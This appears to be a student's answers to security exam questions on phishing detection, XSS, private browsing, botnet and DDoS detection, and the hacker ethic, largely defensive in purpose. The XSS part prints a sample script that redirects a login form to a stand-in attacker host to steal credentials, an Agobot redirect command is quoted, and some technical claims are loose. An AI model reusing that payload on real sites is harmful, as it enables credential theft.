(This question is stolen from someone else's exam.) Phishing web sites create a copy of a legitimate web site and present the user with an authentic-looking login page. When the user enters login credentials (username/password), the information is recorded and later collected by the phisher. The phisher can drive traffic to the phishing page using a number of techniques, including spam email and ads.
(a) Login pages are typically served over HTTPS using the site's certificate.
How can phishers who do not want to pay for a certificate get around this?
One way is for the phisher to compromise a web site that already has an SSL certificate and host the phishing page under that site's domain.
Phishers usually go that far only when they strongly believe the attack will pay off.
Fraudsters often host phishing content on a compromised web site and could therefore take advantage of the site's certificate, but they may not realise that SSL is available on the host and so end up serving the content over plain HTTP instead.
Did any of the certificates found on phishing sites in this period appear to have been issued specifically for the purpose of deception?
http://news.softpedia.com/news/Phishing-Attacks-Move-to-Using-Fake-SSL-Certificates-186445.shtml
http://news.netcraft.com/archives/2012/08/22/phishing-on-sites-using-ssl-certificates.html
(b) Some phishers copy the login page as is. That is, they copy the login
page, but leave the embedded image links pointing to the real banking site. Explain
how a banking site can use this fact to detect phishing sites.
Many attackers design their phishing web pages so that the images are loaded from their original location rather than keeping a copy of them on the fake site. When a user loads such a phishing page, the browser goes and fetches the images from the original site, and the Referer URL in those requests points to the fake site (e.g. www.abc-1.com instead of the bank's own domain). If the bank analyses its web server logs and looks for suspicious Referer headers, it can detect a phishing attack in progress. There is, of course, the possibility that the attacker saves local copies of the images and does not reference the bank's site at all.
Another approach applies when the phisher has copied the HTML code and images from the bank's web site. In that case the phisher must have visited the authentic site before creating the fake one. By embedding the visitor's IP address and a timestamp in the HTML code it serves, the bank can later work out whether its code was copied, and who copied it. There are numerous ways to achieve this: adding markers between HTML tags, including extra GET parameters, or even watermarking images. The most appropriate method depends on the site's web infrastructure.
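As a minimal sketch of the Referer-based log check described above, the Python snippet below scans web server access-log lines for image requests whose Referer points somewhere other than the bank's own domain. The bank hostname, the sample log lines, and the image extensions are all assumptions for illustration; a real deployment would run this over the production access logs.

```python
import re
from urllib.parse import urlparse

# Hypothetical bank domain (an assumption for illustration).
BANK_HOST = "www.abcbank.example"

# Matches the request and Referer fields of an Apache "combined" log line.
LOG_LINE = re.compile(r'"GET (?P<path>\S+) HTTP/[\d.]+" \d+ \d+ "(?P<referer>[^"]*)"')

def suspicious_referers(log_lines):
    """Return (path, referer_host) pairs where an image hosted on the
    bank's server was embedded in a page served from somewhere else."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        path, referer = m.group("path"), m.group("referer")
        if not path.endswith((".png", ".jpg", ".gif")):
            continue
        host = urlparse(referer).netloc
        if host and host != BANK_HOST:
            hits.append((path, host))
    return hits

logs = [
    '1.2.3.4 - - [10/Oct/2013:13:55:36] "GET /img/logo.png HTTP/1.1" 200 512 "http://www.abcbank.example/login"',
    '5.6.7.8 - - [10/Oct/2013:13:56:01] "GET /img/logo.png HTTP/1.1" 200 512 "http://www.abc-1.com/login"',
]
print(suspicious_referers(logs))   # only the second request is flagged
```

Flagged hosts can then be visited manually to confirm that they are serving a cloned login page.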
http://palizine.plynt.com/issues/2006Sep/phishing-detection/
(c) Some phishers may make a complete copy of the phished site, duplicating all images and scripts on the target page and storing them on the phishing server.
(d) Suppose the banking login page has an XSS vulnerability. Explain how this can make the phisher's life easier.
With an XSS vulnerability, the attacker can craft links to the banking site that, when clicked, deliver active content that appears to originate from the bank itself: the victim sees the genuine domain and a valid certificate, yet the injected script runs in the context of the bank's page and can, for example, redirect the submitted credentials to the attacker. The payload is often hex-encoded and padded with obfuscating characters so the link looks harmless, and the whole attack works because the web application fails to properly escape quote characters and HTML tags before echoing user input back into the page.
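The escaping failure mentioned above can be shown in a few lines. This is a deliberately simplified sketch: the page template, the parameter name, and the attacker URL (`evil.example`) are all made up for illustration.

```python
import html

def render_login_unsafe(username):
    # Vulnerable: user-controlled input is echoed into the page verbatim,
    # so any <script> tag in it becomes live code on the bank's own page.
    return f"<p>Welcome back, {username}</p>"

def render_login_safe(username):
    # Fixed: quote characters and HTML tags are escaped before output.
    return f"<p>Welcome back, {html.escape(username)}</p>"

# Hypothetical payload a phisher might smuggle in via a crafted link:
payload = '<script>document.forms[0].action="http://evil.example/steal"</script>'

print(render_login_unsafe(payload))  # script lands in the page unmodified
print(render_login_safe(payload))    # rendered as inert text
```

In the unsafe version the phisher never needs to clone the site at all; the victim is on the real login page while the injected script quietly reroutes the form submission.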
http://www.planb-security.net/wp/503167-001_PhishingDetectionandPrevention.pdf
3. Your friend thinks he's a security expert (though he hasn't been to TAFE) and claims that the best way to protect your data when using the Internet at home is to use the "private" or "incognito" mode in Firefox or Chrome for sensitive transactions. What security benefits does such an action provide? Is this really a valid way to protect your data? If it isn't, how would you take this guy down?
The only real benefit of private browsing is that it does not record your activity locally: visited pages are not added to the history menu or the address-bar suggestions, no new passwords are saved, nothing you enter into a search bar or a form is auto-saved, and no download history is kept. Cookies store only limited, session-scoped information for the sites you visit, such as login status, and are discarded when the window closes.
While private browsing is useful for local privacy, it is not effective at protecting you from attacks such as:
keylogging to capture your usernames and passwords; malware that steals cached browsing data to obtain your sensitive information (and, with access to the machine, even your WLAN usernames and passwords); viruses that go after your data; and tracking programs.
http://support.mozilla.org/en-US/kb/private-browsing-browse-web-without-saving-info#w_what-does-private-browsing-not-save
http://internoobs.wonderhowto.com/inspiration/private-browsing-for-firefox-chrome-internet-explorer-0126965/
4. (This question is stolen from someone else's exam.) A bot is remotely controlled software executing on a compromised host. A botnet is a network of bots and a controller that controls their operation. Most bots are highly programmable, allowing the bot controller to send programs that are executed by bots. Bot detection and remediation can be carried out on a network by analysing network traffic, or on a host by trying to identify software that is acting as a bot.
(a) Bots are widely used for relaying email spam. Describe a network defence that detects bots used for spam.
A spam-filtering service is a basic and effective way to detect spam email bots. Run alongside antivirus, it automatically removes spam, viruses, and other email-borne threats via the cloud, and it prevents unwanted spam and blocks email viruses from reaching users.
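A simple network-level signal that complements filtering is that an ordinary workstation should rarely open direct outbound SMTP (port 25) connections, since clients normally relay mail through the organisation's mail server; a host suddenly doing so in volume is likely a spam bot. The sketch below applies that idea to flow records. The host addresses, the flow format, and the threshold are all assumptions for illustration.

```python
from collections import Counter

# Flow records modelled as (src_host, dst_port) pairs.
MAIL_SERVER = "10.0.0.25"   # hypothetical: the only host expected to speak SMTP
THRESHOLD = 3               # hypothetical: max outbound port-25 flows per ordinary host

def smtp_bot_suspects(flows):
    """Flag internal hosts (other than the mail server) that open an
    unusual number of outbound SMTP connections."""
    counts = Counter(src for src, dport in flows if dport == 25)
    return sorted(h for h, n in counts.items()
                  if h != MAIL_SERVER and n > THRESHOLD)

flows = ([("10.0.0.25", 25)] * 50    # the mail server, legitimately busy
         + [("10.0.0.7", 25)] * 40   # a workstation spraying SMTP: suspicious
         + [("10.0.0.9", 80)] * 10)  # ordinary web traffic, ignored
print(smtp_bot_suspects(flows))      # → ['10.0.0.7']
```

Flagged hosts can then be inspected on the host side for bot software.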
(b) Bots have been used for launching distributed denial of service (DDoS) attacks. Describe a network defence that detects bots carrying out a DDoS attack. Use some characteristic of the way DDoS attacks are usually done other than measuring the amount of network traffic coming from a host on the network.
We can neutralise the botnet's handlers: there are usually few DDoS handlers deployed compared to the number of agents, so neutralising even a few handlers can render many agents useless, thereby thwarting the DDoS attack.
With Snort as an IDS/IPS, rules can be written to match likely DDoS traffic on the network, using Snort's signature ID (SID) mechanism to perform packet logging. Other approaches include activity logs, change-point detection (establishing what is normal on the network and flagging what is abnormal), and wavelet analysis of the traffic signal.
We can also use Wireshark to capture network packets; packets it flags in red can point to a DDoS against the server. DDoS attacks are often SYN floods coming from all over the globe.
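The SYN-flood characteristic just mentioned (many SYNs, almost no completed handshakes) is exactly the kind of signal the question asks for, since it does not depend on raw traffic volume from any one host. Below is a minimal sketch; the packet model, the sample addresses, and both thresholds are assumptions for illustration, and a real tool would read the flags from a libpcap capture.

```python
from collections import Counter

# Minimal packet model: (src_ip, tcp_flags), where "S" is a bare SYN and
# "A" is an ACK that completes the handshake.
SYN_THRESHOLD = 100   # hypothetical: SYNs before a source looks suspicious

def syn_flood_sources(packets):
    """Flag sources that send many SYNs but almost never complete the
    TCP handshake, the signature of a SYN flood."""
    syns = Counter(src for src, flags in packets if flags == "S")
    acks = Counter(src for src, flags in packets if flags == "A")
    return sorted(src for src, n in syns.items()
                  if n > SYN_THRESHOLD and acks[src] < n // 10)

normal = [("192.0.2.1", "S"), ("192.0.2.1", "A")] * 60          # handshakes complete
attack = [("203.0.113.%d" % i, "S") for i in range(5) for _ in range(150)]
print(syn_flood_sources(normal + attack))   # the five flooding sources
```

Note that the well-behaved client is not flagged even though it sends plenty of traffic, because its SYNs are matched by ACKs.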
There is another way of detecting DDoS attacks, drawn from the common intrusion detection framework: A-boxes, network activity analysis devices that can be specific hardware, software, or both. They gather information and look for defined patterns, such as the consistent stream of packets produced by trojans or viruses. An A-box is well suited to detecting DDoS attacks and router attacks.
Detect and stop malicious requests: because application-layer DDoS attacks mimic regular web application traffic, they can be hard to detect through typical network-level DDoS techniques. However, using a combination of application-level controls and anomaly detection, organisations can identify and stop malicious traffic. Measures include:
Detect an excessive number of requests from a single source or user session: automated attack sources almost always request web pages more rapidly than ordinary users.
Prevent known network and application DDoS attacks: many types of DDoS attack rely on simple network techniques such as fragmented packets, spoofing, or never completing the TCP handshake. More advanced attacks, typically at the application level, attempt to overwhelm server resources. These attacks can be detected through unusual user activity and known application attack signatures.
Distinguish the attributes, and the aftermath, of a malicious request: some DDoS attacks can be detected through known attack patterns or signatures. In addition, many malicious web requests do not conform to the HTTP protocol standards; the Slowloris DDoS attack, for instance, included superfluous HTTP headers. DDoS clients may also request web pages that do not exist, and attacks may generate web server errors or slow web server response times.
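The first of the measures above, spotting an excessive request rate from a single source, can be sketched with a sliding window over timestamped requests. The window length, the per-window limit, and the sample clients are assumptions for illustration; production systems would feed this from the web server's access log.

```python
from collections import defaultdict

WINDOW = 10   # hypothetical: window length in seconds
LIMIT = 20    # hypothetical: max requests per client inside any window

def rate_offenders(requests):
    """Return clients that exceed LIMIT requests within any WINDOW-second
    span. Input: (timestamp_seconds, client_ip) pairs in any order."""
    times = defaultdict(list)
    for t, ip in sorted(requests):
        times[ip].append(t)
    offenders = set()
    for ip, ts in times.items():
        lo = 0
        for hi in range(len(ts)):           # slide the window over sorted times
            while ts[hi] - ts[lo] > WINDOW:
                lo += 1
            if hi - lo + 1 > LIMIT:
                offenders.add(ip)
                break
    return sorted(offenders)

human = [(t * 5.0, "198.51.100.9") for t in range(30)]    # one hit every 5 s
bot   = [(t * 0.1, "203.0.113.66") for t in range(100)]   # ten hits per second
print(rate_offenders(human + bot))   # → ['203.0.113.66']
```

The human browser never comes close to the limit, while the automated client trips it within its first few seconds of activity.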
http://www.thedatachain.com/articles/2011/8/4_steps_to_defeat_a_ddos_attack_on_your_organisation
http://www.skullbox.net/ids.php
http://www.slideshare.net/MahendraPratapSingh3/idsips-snort-introduction-part-1
(c) One possible way to do host-based bot detection is to compare contents of network packets that might be commands from the controller with system calls on the host. Explain how this idea might help you detect a bot executing a port redirect command (i.e. receive input on one port and send it back out on another).
Using libpcap we can capture the network traffic and filter it for the string "redirect" to find any such command in the captured packets.
For example, Agobot uses the following commands:
<Ago> .redirect.tcp 2352 www.microsoft.com 80
<Agobot3> redirtcp: redirecting from port 2352 to "www.microsoft.com:80".
http://www.stanford.edu/~stinson/paper_notes/bots/bot_refs/agobot3_commandref.html
Hence, applying a filter that searches for "redirect" would likely reveal this type of packet. The hit can then be compared with system-call activity on the host: if a local process has actually opened a listening socket on the port named in the command (here 2352) and is forwarding data out to another port, that is strong evidence of a bot on the machine.
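The correlation step can be sketched as follows. The command pattern is modelled on the Agobot syntax shown above; the captured payloads and the table of listening ports are mocked for illustration (in practice they would come from libpcap and from auditing the host's bind()/listen() system calls).

```python
import re

# Matches the Agobot-style command ".redirect.tcp <listen_port> <host> <port>".
REDIRECT_CMD = re.compile(r"\.redirect\.tcp (\d+) (\S+) (\d+)")

def correlate(payloads, listening_ports):
    """Match redirect commands seen on the wire against ports a local
    process has actually opened; a match suggests a bot executed the command."""
    hits = []
    for data in payloads:
        m = REDIRECT_CMD.search(data)
        if m and int(m.group(1)) in listening_ports:
            hits.append((int(m.group(1)), m.group(2), int(m.group(3))))
    return hits

# Mocked capture: one redirect command and one unrelated IRC message.
payloads = [".redirect.tcp 2352 www.microsoft.com 80", "PRIVMSG #chan :hello"]
print(correlate(payloads, listening_ports={2352, 22}))
```

A command that appears on the wire but is never reflected in the host's socket activity may just be noise; it is the agreement between the two views that identifies the bot.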
5. From http://project.cyberpunk.ru/idb/hacker_ethics.html:
The idea of a "hacker ethic" is perhaps best formulated in Steven Levy's 1984 book, Hackers: Heroes of the Computer Revolution. Levy came up with six tenets:
1. Access to computers - and anything which might teach you something about the way the world works - should be unlimited and total. Always yield to the Hands-On Imperative!
2. All information should be free.
3. Mistrust authority - promote decentralization.
4. Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race, or position.
5. You can create art and beauty on a computer.
6. Computers can change your life for the better.
Ibid., from Richard Stallman:
"I don't know if there actually is a hacker's ethic as such, but there sure was an M.I.T. Artificial Intelligence Lab ethic. This was that bureaucracy should not be allowed to get in the way of doing anything useful. Rules did not matter - results mattered. Rules, in the form of computer security or locks on doors, were held in total, absolute disrespect. We would be proud of how quickly we would sweep away whatever little piece of bureaucracy was getting in the way, how little time it forced you to waste. Anyone who dared to lock a terminal in his office, say because he was a professor and thought he was more important than other people, would likely find his door left open the next morning. I would just climb over the ceiling or under the floor, move the terminal out, or leave the door open with a note saying what a big inconvenience it is to have to go under the floor, "so please do not inconvenience people by locking the door any longer." Even now, there is a big wrench at the AI Lab entitled "the seventh-floor master key", to be used in case anyone dares to lock up one of the more fancy terminals."
The types of people who are interested in and passionate about hacking are the same types of people who are charged with the protection of the networks they seek to exploit. It's almost as if the inmates are taking over the asylum! Discuss how the hacker ethic can lead to the ethical hacker.
In ethical terms this is really about the grey-hat hacker: a person whose intentions are good but who has no permission to hack, so we cannot yet call him an ethical hacker. Hacking into a computer is not as simple as it is often portrayed; it is a long, time-consuming process, and hackers spend most of their time with computers rather than with family and friends.
One example: in 2011 a man found a flaw in a superannuation web site. While going through his own super fund account he changed some parameters in the URL, which led him to someone else's super details. For further testing he went through 50 more accounts and downloaded their super details as proof, including those of NSW police officers and magistrates, and then contacted the company to point out the vulnerability in its web site. He did it as a good deed, but the super company disabled his account straight away and ended up sending the police around with a letter threatening legal action.
http://www.smh.com.au/it-pro/security-it/super-bad-first-state-set-police-on-man-who-showed-them-how--770000-accounts-could-be-ripped-off-20111018-1lvx1.html
In Levy's terms, this person was acting as a hacker, hoping to improve the lives of the affected users by pointing out the flaws he had identified, but the authority rejected the very work that could have fixed the security flaws apparent in this case.
That experience led him to become an ethical hacker, consistent with tenet 4 (hackers should be judged by their hacking, not bogus criteria such as degrees, age, race, or position); he now runs his own company, http://www.osisecurity.com.au/.
There is also the story of Kevin Mitnick and how he became an ethical hacker out of a black hat; it is about opportunity, second chances, and looking at the skills of the person.
http://www.ukessays.com/essays/philosophy/kevin-mitnick-ethical-issues-and-computer-hacking-history-philosophy-essay.php
Ethical hackers know the penalties that apply within their jurisdiction; hence all security auditing and penetration testing should be performed lawfully, on the basis of granted permission, otherwise the consequences can be severe. Ethical hacking is therefore not just running a set of tools against a system to determine what is exploitable within that network. As Levy stated, having access to computers enhances learning and encourages hands-on practicality, which may ultimately change the world by producing better and more efficient security measures within our networks. Ethical hacking usually takes place where flaws are already apparent, and as such it is relatively expensive; however, the community around the Internet helping to find and work on areas of vulnerability reflects the sharing that Levy described, much like the culture of the MIT AI Lab.